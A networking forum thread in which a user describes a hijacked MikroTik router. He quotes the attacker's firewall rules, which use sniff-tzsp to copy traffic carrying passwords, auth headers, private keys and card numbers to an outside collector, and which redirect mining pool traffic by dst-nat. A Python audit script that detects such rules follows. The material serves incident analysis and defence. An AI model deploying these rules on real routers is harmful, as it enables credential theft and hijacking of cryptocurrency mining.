makstex
newbie
Topic Author
Posts: 46
Joined: Fri Mar 27, 2009 6:31 am

Curious what they broke in through.

Fri Nov 09, 2018 12:28 pm

Maybe it will come in handy for someone.
Friends asked me to help with a MikroTik; everything had become too slow.
I went in to check and dug up the following:
1. The winbox port had been changed to 65000
2. SOCKS and web proxy had been enabled
3. Several rules had been added for sniffing passwords and stealing wallets; I went to the address everything was being sent to, and the pcaps are all publicly accessible. I commented out the collector's IP address just in case.
The MikroTik version at the time of installation was the latest, 6.42.7, and the password was 20 characters; I can't see how they broke in, since all the logs were wiped and disabled. I disabled all services and access from outside. For now I have disabled the added rules and left them for study.
...skip...
/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork disabled=yes new-connection-mark=Ethereum passthrough=yes
add action=add-dst-to-address-list address-list=Ethereum address-list-timeout=none-dynamic chain=prerouting content=eth_submitWork disabled=yes
add action=fasttrack-connection chain=prerouting content=eth_submitWork disabled=yes
add action=mark-connection chain=prerouting content=mining.submit disabled=yes new-connection-mark=Bitcoin passthrough=yes
add action=add-dst-to-address-list address-list=Bitcoin address-list-timeout=none-dynamic chain=prerouting content=mining.submit disabled=yes
add action=sniff-tzsp chain=prerouting content="ccn=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=privatekey disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=json disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="passwd=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin disabled=yes
/ip firewall nat
add action=dst-nat chain=dstnat disabled=yes dst-address-list=Ethereum protocol=tcp to-addresses=xx.xx.xx.xx to-ports=4444
add action=dst-nat chain=dstnat disabled=yes dst-address-list=Bitcoin protocol=tcp to-addresses=xx.xx.xx.xx to-ports=3333
...skip...
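As an added defensive example (not code from this thread or from MikroTik): a small Python audit that scans a RouterOS `/export` for the pattern described above, namely sniff-tzsp rules, rules matching mining traffic, dst-nat redirects to an outside host, moved service ports and enabled proxies. The sample export is constructed from the rules quoted in the post, with the collector address kept as the same placeholder; the default-port table is an assumption for the services it lists.

```python
import re
# Constructed sample /export modelled on the rules quoted in the post; the collector
# address is a placeholder as in the original, and the masquerade rule is an ordinary
# one included to show that it is not flagged.
SAMPLE_EXPORT = """\
/ip service
set winbox port=65000
/ip socks
set enabled=yes
/ip firewall mangle
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=xx.xx.xx.xx sniff-target-port=60000
add action=mark-connection chain=prerouting content=mining.submit new-connection-mark=Bitcoin passthrough=yes
/ip firewall nat
add action=dst-nat chain=dstnat dst-address-list=Bitcoin protocol=tcp to-addresses=xx.xx.xx.xx to-ports=3333
add action=masquerade chain=srcnat out-interface=ether1
"""
MINING_CONTENT = ("mining.submit", "eth_submitwork")   # stratum / getwork markers
DEFAULT_PORTS = {"winbox": "8291", "www": "80", "ssh": "22", "api": "8728"}  # assumed defaults

def parse_export(text):
    """Yield (section, name, {key: value}) for each add/set line of an export."""
    section = None
    for raw in text.splitlines():
        line, toks = raw.strip(), raw.split()
        if line.startswith("/"):
            section = line
        elif toks and toks[0] in ("add", "set"):
            name = toks[1] if len(toks) > 1 and "=" not in toks[1] else ""
            kv = re.findall(r'(\S+?)=("[^"]*"|\S+)', line)   # handles quoted values
            yield section, name, {k: v.strip('"') for k, v in kv}

def audit(text):
    """Return (category, detail) findings matching the compromise described above."""
    findings = []
    for section, name, r in parse_export(text):
        action, content = r.get("action"), r.get("content", "").lower()
        if action == "sniff-tzsp":   # packets copied off-box to a collector
            findings.append(("sniffer", f"{content!r} -> {r.get('sniff-target')}:{r.get('sniff-target-port')}"))
        elif any(p in content for p in MINING_CONTENT):
            findings.append(("mining-match", f"{section} {action} on {content!r}"))
        elif action == "dst-nat" and "to-addresses" in r:   # pool/wallet traffic redirected
            findings.append(("redirect", f"{r.get('dst-address-list')} -> {r['to-addresses']}:{r.get('to-ports')}"))
        elif section == "/ip service" and name in DEFAULT_PORTS and r.get("port", DEFAULT_PORTS[name]) != DEFAULT_PORTS[name]:
            findings.append(("service-port", f"{name} moved to port {r['port']}"))
        elif section in ("/ip socks", "/ip proxy") and r.get("enabled") == "yes":
            findings.append(("proxy", f"{section} enabled"))
    return findings
if __name__ == "__main__":
    for cat, detail in audit(SAMPLE_EXPORT):
        print(f"[{cat}] {detail}")
```

Run it against a real `/export` saved to a file; a dst-nat finding pointing at an address outside your own networks is the one to look at first.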
 
Jotne
Forum Guru
Posts: 1244
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Curious what they broke in through.

Fri Nov 09, 2018 1:46 pm

What would this be in English?
makstex
newbie
Topic Author
Posts: 46
Joined: Fri Mar 27, 2009 6:31 am

Re: Curious what they broke in through.

Fri Nov 09, 2018 2:02 pm

Easy, Google is here to help:
Maybe it will come in handy for someone.
My friends asked me to help with a MikroTik; everything became too slow to work.
It is useful to check and find the following:
1. Changed winbox port to 65000
2. Turned on socks and webproxy
3. Added a few rules for sniffing passwords and splicing wallets, went to the address to which everything was sent - the pcap was all in the public domain; commented out the IP address of the collector just in case.
The MikroTik version at the time of installation was the last, 6.42.7, and the password was 20 characters; I could not see it, because all the logs are worn and disconnected; I disabled all services and access from the outside. So far, the added rules have been disabled and left for study.
I will not insert the code, it is international)
